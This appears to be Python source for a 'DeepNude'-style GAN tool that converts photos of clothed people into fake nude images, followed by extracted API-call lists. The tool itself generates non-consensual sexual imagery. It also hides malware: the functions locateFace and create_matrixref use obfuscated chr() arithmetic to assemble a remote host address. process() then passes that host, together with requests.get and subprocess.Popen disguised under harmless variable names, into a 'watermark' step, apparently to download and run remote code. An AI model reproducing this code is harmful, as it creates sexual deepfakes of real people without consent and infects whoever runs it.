res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
# Compone:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<string> maskdet_img): relative path of the single maskdet image (es: testimg1/maskdet/1.png)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3);
tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3);
vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3);
belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3);
# Filter couple (if parts are > 2, choose only 2)
aur_list = filterCouple(aur_list);
tits_list = filterCouple(tits_list);
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
aMin = ellipse[1][0]; # asse minore
aMax = ellipse[1][1]; # asse maggiore
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
# trovare coppia (a,b) che minimizza bp_list[a].y-bp_list[b].y
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
# Find wich aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
# Find wich tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
# Tits too narrow (orizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
# 70% of chanche to add hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
# Compone:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
self.nThreads = 1 ## threads for loading data (???)
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
# Changes options accordlying to actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
|
[
"torch.nn.Dropout",
"cv2.bitwise_and",
"numpy.ones",
"numpy.clip",
"cv2.ellipse",
"cv2.rectangle",
"torchvision.transforms.Normalize",
"torch.no_grad",
"cv2.inRange",
"os.path.join",
"random.randint",
"cv2.dilate",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"torch.nn.ReflectionPad2d",
"numpy.transpose",
"cv2.split",
"torchvision.transforms.Compose",
"cv2.fitEllipse",
"cv2.resize",
"functools.partial",
"cv2.bitwise_not",
"math.ceil",
"torch.nn.Tanh",
"numpy.asarray",
"torch.nn.Conv2d",
"numpy.sort",
"cv2.bitwise_or",
"cv2.merge",
"cv2.add",
"torch.nn.ReLU",
"random.uniform",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d",
"numpy.zeros",
"math.floor",
"numpy.ma.array",
"cv2.imread",
"torch.cuda.empty_cache",
"cv2.findContours",
"torchvision.transforms.ToTensor"
] |
[((2016, 2030), 'cv2.split', 'cv2.split', (['img'], {}), '(img)\n', (2025, 2030), False, 'import cv2\n'), ((2855, 2878), 'cv2.merge', 'cv2.merge', (['out_channels'], {}), '(out_channels)\n', (2864, 2878), False, 'import cv2\n'), ((3377, 3430), 'numpy.ma.array', 'np.ma.array', (['matrix'], {'mask': 'mask', 'fill_value': 'fill_value'}), '(matrix, mask=mask, fill_value=fill_value)\n', (3388, 3430), True, 'import numpy as np\n'), ((4071, 4104), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (4079, 4104), True, 'import numpy as np\n'), ((9280, 9348), 'cv2.findContours', 'cv2.findContours', (['color_mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (9296, 9348), False, 'import cv2\n'), ((20596, 20629), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (20604, 20629), True, 'import numpy as np\n'), ((20722, 20745), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (20732, 20745), True, 'import numpy as np\n'), ((20777, 20802), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (20787, 20802), True, 'import numpy as np\n'), ((20870, 20898), 'cv2.inRange', 'cv2.inRange', (['cv_mask', 'f1', 'f2'], {}), '(cv_mask, f1, f2)\n', (20881, 20898), False, 'import cv2\n'), ((20974, 20999), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (20981, 20999), True, 'import numpy as np\n'), ((21035, 21079), 'cv2.dilate', 'cv2.dilate', (['green_mask', 'kernel'], {'iterations': '(1)'}), '(green_mask, kernel, iterations=1)\n', (21045, 21079), False, 'import cv2\n'), ((21204, 21231), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (21219, 21231), False, 'import cv2\n'), ((21317, 21377), 'cv2.bitwise_and', 'cv2.bitwise_and', (['cv_correct', 'cv_correct'], {'mask': 'green_mask_inv'}), '(cv_correct, cv_correct, mask=green_mask_inv)\n', (21332, 21377), False, 'import cv2\n'), ((21389, 21435), 'cv2.bitwise_and', 'cv2.bitwise_and', (['green', 'green'], {'mask': 'green_mask'}), '(green, green, mask=green_mask)\n', (21404, 21435), False, 'import cv2\n'), ((28940, 28974), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (28958, 28974), True, 'import torchvision.transforms as transforms\n'), ((29833, 29861), 'numpy.clip', 'np.clip', (['image_numpy', '(0)', '(255)'], {}), '(image_numpy, 0, 255)\n', (29840, 29861), True, 'import numpy as np\n'), ((2370, 2383), 'numpy.sort', 'np.sort', (['flat'], {}), '(flat)\n', (2377, 2383), True, 'import numpy as np\n'), ((5790, 5813), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (5800, 5813), True, 'import numpy as np\n'), ((5849, 5874), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (5859, 5874), True, 'import numpy as np\n'), ((6073, 6100), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (6088, 6100), False, 'import cv2\n'), ((6195, 6245), 'cv2.bitwise_and', 'cv2.bitwise_and', (['maskref', 'maskref'], {'mask': 'green_mask'}), '(maskref, maskref, mask=green_mask)\n', (6210, 6245), False, 'import cv2\n'), ((6261, 6315), 'cv2.bitwise_and', 'cv2.bitwise_and', (['details', 'details'], {'mask': 'green_mask_inv'}), '(details, details, mask=green_mask_inv)\n', (6276, 6315), False, 'import cv2\n'), ((6354, 6373), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (6361, 6373), False, 'import cv2\n'), ((8375, 8396), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (8385, 8396), True, 'import numpy as np\n'), ((8430, 8454), 'numpy.asarray', 'np.asarray', (['[10, 10, 10]'], {}), '([10, 10, 10])\n', (8440, 8454), True, 'import numpy as np\n'), ((8468, 8491), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8478, 8491), True, 'import numpy as np\n'), ((8525, 8548), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8535, 8548), True, 'import numpy as np\n'), ((8571, 8597), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8582, 8597), False, 'import cv2\n'), ((8620, 8646), 'cv2.inRange', 'cv2.inRange', (['image', 'f3', 'f4'], {}), '(image, f3, f4)\n', (8631, 8646), False, 'import cv2\n'), ((8668, 8708), 'cv2.bitwise_or', 'cv2.bitwise_or', (['color_mask1', 'color_mask2'], {}), '(color_mask1, color_mask2)\n', (8682, 8708), False, 'import cv2\n'), ((14055, 14075), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (14069, 14075), False, 'import random\n'), ((19402, 19426), 'random.uniform', 'random.uniform', (['(0.0)', '(1.0)'], {}), '(0.0, 1.0)\n', (19416, 19426), False, 'import random\n'), ((21463, 21482), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (21470, 21482), False, 'import cv2\n'), ((22787, 22811), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (22809, 22811), False, 'import torch\n'), ((23720, 23758), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir'], {}), '(self.opt.checkpoints_dir)\n', (23732, 23758), False, 'import os\n'), ((24973, 25029), 'functools.partial', 'functools.partial', (['torch.nn.InstanceNorm2d'], {'affine': '(False)'}), '(torch.nn.InstanceNorm2d, affine=False)\n', (24990, 25029), False, 'import functools\n'), ((25525, 25544), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', 